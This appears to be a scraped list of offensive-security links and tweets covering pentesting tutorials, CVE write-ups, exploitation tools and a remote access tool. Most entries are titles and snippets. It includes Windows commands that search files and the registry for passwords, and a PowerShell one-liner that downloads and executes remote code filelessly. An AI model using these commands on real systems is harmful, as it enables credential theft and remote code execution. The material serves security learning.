Day 59: Windows API for Pentesting (Part 1) – int0x33 – Medium
https://medium.com/@int0x33/day-59-windows-api-for-pentesting-part-1-178c6ba280cb
https://medium.com/@int0x33/day-59-windows-api-for-pentesting-part-1-178c6ba280cb
Medium
Day 59: Windows API for Pentesting (Part 1)
What is the Windows API?
Analyzing a Windows DHCP Server Bug (CVE-2019-0626) - MalwareTech
https://www.malwaretech.com/2019/03/analyzing-a-windows-dhcp-server-bug-cve-2019-0626.html
https://www.malwaretech.com/2019/03/analyzing-a-windows-dhcp-server-bug-cve-2019-0626.html
Malwaretech
Analyzing a Windows DHCP Server Bug (CVE-2019-0626)
Today I’ll be doing an in-depth write up on CVE-2019-0626, and how to find it. Due to the fact this bug only exists on Windows Server, I’ll be using a Server 2016 VM (corresponding patch is KB4487026).
Note: this bug was not found by me, I reverse engineered…
Note: this bug was not found by me, I reverse engineered…
Arbitrary File Reading in Next.js < 2.4.1 – Arseny Reutov – Medium
https://raz0r.name/vulnerabilities/arbitrary-file-reading-in-next-js-2-4-1/
https://raz0r.name/vulnerabilities/arbitrary-file-reading-in-next-js-2-4-1/
Raz0r.name — Web Application Security
Arbitrary File Reading in Next.js < 2.4.1 | Raz0r — Web3 Security
Next.js is a quite popular (>13k stars on GitHub) framework for server-rendered React applications. It includes a NodeJS server which allows to render HTML pages dynamically. While digging into server's code, a list of internal routes drew my attention: defineRoutes()…
File upload vulnerability scanner and exploitation tool.
https://t.co/JoQu6EQz6Y
https://t.co/JoQu6EQz6Y
GitHub
almandin/fuxploider
File upload vulnerability scanner and exploitation tool. - almandin/fuxploider
Credentials & lateral movement
findstr /si password *.txt
findstr /si password *.xml
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /spin "password" *.*
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
findstr /si password *.txt
findstr /si password *.xml
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /spin "password" *.*
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
GitHub - Pure-L0G1C/Loki: Remote Access Tool/Botnet
https://github.com/Pure-L0G1C/Loki
https://github.com/Pure-L0G1C/Loki
GitHub
GitHub - Bitwise-01/Loki: Remote Access Tool
Remote Access Tool. Contribute to Bitwise-01/Loki development by creating an account on GitHub.
Automation exploit with mad-metasploit(db_autopwn module) - HAHWUL :: 하훌
https://www.hahwul.com/2019/03/automation-exploit-with-mad-metasploit.html
https://www.hahwul.com/2019/03/automation-exploit-with-mad-metasploit.html
Hahwul
Automation exploit with mad-metasploit(db_autopwn module)
Remote Code Execution — Gaining Domain Admin privileges due to a typo
https://medium.com/@DanielC7/remote-code-execution-gaining-domain-admin-privileges-due-to-a-typo-dbf8773df767
https://medium.com/@DanielC7/remote-code-execution-gaining-domain-admin-privileges-due-to-a-typo-dbf8773df767
Medium
Remote Code Execution — Gaining Domain Admin due to a typo
CVE-2018–9022
MS Excel Weaponization Techniques – Bank Security – Medium
https://medium.com/@Bank_Security/ms-excel-weaponization-techniques-79ac51610bf5
https://medium.com/@Bank_Security/ms-excel-weaponization-techniques-79ac51610bf5
Medium
MS Excel Weaponization Techniques
Different methods to run a command line via Excel file in order to spawn a Meterpreter reverse shell.
Today's Burp Suite release (2.0.18) includes a major iteration of the new crawler algorithm, based on real-world feedback. We're getting closer to Burp Suite 2.0 coming out of beta.
https://portswigger.net
https://portswigger.net
portswigger.net
Web Application Security, Testing, & Scanning - PortSwigger
PortSwigger offers tools for web application security, testing, & scanning. Choose from a range of security tools, & identify the very latest vulnerabilities.
Introduction to File Format Fuzzing & Exploitation – Daniel C – Medium
https://medium.com/@DanielC7/introduction-to-file-format-fuzzing-exploitation-922143ab2ab3
https://medium.com/@DanielC7/introduction-to-file-format-fuzzing-exploitation-922143ab2ab3
Medium
Introduction to File Format Fuzzing & Exploitation
This post will explain the process of finding and exploiting a previously unknown vulnerability in a real-world piece of software to…
Mobile Security class: https://t.co/TAAnBMCBqB! They are not perfect, but students learned how to reverse apps, find&exploit real-world bugs, reason about threat modelling / system security, etc.
Preview Pane: Malware launches in preview without opening MS Word doc
https://www.bromium.com/new-malware-launches-in-preview-pane
https://www.bromium.com/new-malware-launches-in-preview-pane
Powershell + COM fileless download exec alternative:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81
FE221")); $o.Open("GET", "https://t.co/qiHWmEcBZ5", $False); $o.Send(); IEX $o.responseText;
You can even use response headers to fetch your payload instead since the object support the getResponseHeader(string) method.
And set the proxy using setProxy() method.
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81
FE221")); $o.Open("GET", "https://t.co/qiHWmEcBZ5", $False); $o.Send(); IEX $o.responseText;
You can even use response headers to fetch your payload instead since the object support the getResponseHeader(string) method.
And set the proxy using setProxy() method.
Creating a Simple Free Malware Analysis Environment - MalwareTech
https://www.malwaretech.com/2017/11/creating-a-simple-free-malware-analysis-environment.html
https://www.malwaretech.com/2017/11/creating-a-simple-free-malware-analysis-environment.html
Malwaretech
Creating a Simple Free Malware Analysis Environment
Computer Requirements:
A CPU with AMD-V or Intel VT-x support (pretty much any modern CPU).
4 GB RAM (more is better).
Make sure Virtualization (AMD-V or Intel VT-x) is enabled in the BIOS. To do this, you’ll need to google “enable virtualization”…
A CPU with AMD-V or Intel VT-x support (pretty much any modern CPU).
4 GB RAM (more is better).
Make sure Virtualization (AMD-V or Intel VT-x) is enabled in the BIOS. To do this, you’ll need to google “enable virtualization”…
Add Drupal SA-CORE-2019-003 (CVE-2019-6340) · Issue #11481 · rapid7/metasploit-framework · GitHub
https://github.com/rapid7/metasploit-framework/pull/11481#issuecomment-469951674
https://github.com/rapid7/metasploit-framework/pull/11481#issuecomment-469951674
GitHub
Add Drupal SA-CORE-2019-003 (CVE-2019-6340) by rotemreiss · Pull Request #11481 · rapid7/metasploit-framework
Add new exploit for Drupal SA-CORE-2019-003.
This is my first Metasploit exploit so be gentle with me ;)
#7108, #9876
This is my first Metasploit exploit so be gentle with me ;)
#7108, #9876
An Hour with Ghidra : The Good and The Ugly
http://blog.fadyothman.com/an-hour-with-ghidra-the-good-and-the-ugly/
http://blog.fadyothman.com/an-hour-with-ghidra-the-good-and-the-ugly/
Fady's Technical Blog
An Hour with Ghidra : The Good and The Ugly
So, the NSA decided to release their reverse engineering tool named Ghidra, I
did have some time to play with it, and to be honest I was really impressed it's
an awesome tool, however there are some problems that I encountered when using
the tool.
The Good…
did have some time to play with it, and to be honest I was really impressed it's
an awesome tool, however there are some problems that I encountered when using
the tool.
The Good…
Server Side Request Forgery SSRF Types And Ways To Exploit It:-
Part 1:-
https://t.co/Iv2NkSLDYB
Part 2:-
https://t.co/p7rVZYCZkL
Part 1:-
https://t.co/Iv2NkSLDYB
Part 2:-
https://t.co/p7rVZYCZkL
HackersOnlineClub
Server Side Request Forgery SSRF Types And Ways To Exploit it (Part-1) - HackersOnlineClub
In this tutorial we will learn about SSRF and its Types. What is Server Side Request Forgery (SSRF)? Server Side Request Forgery (SSRF) refers...
Released a short introductory/quickstart tutorial for Ghidra: Solving a simple crackme. https://t.co/1cRlJi1i21
YouTube
Ghidra quickstart & tutorial: Solving a simple crackme
In this introduction to Ghidra we will solve a simple crackme - without reading any assembly! Twitter: https://twitter.com/ghidraninja Links from the video: ...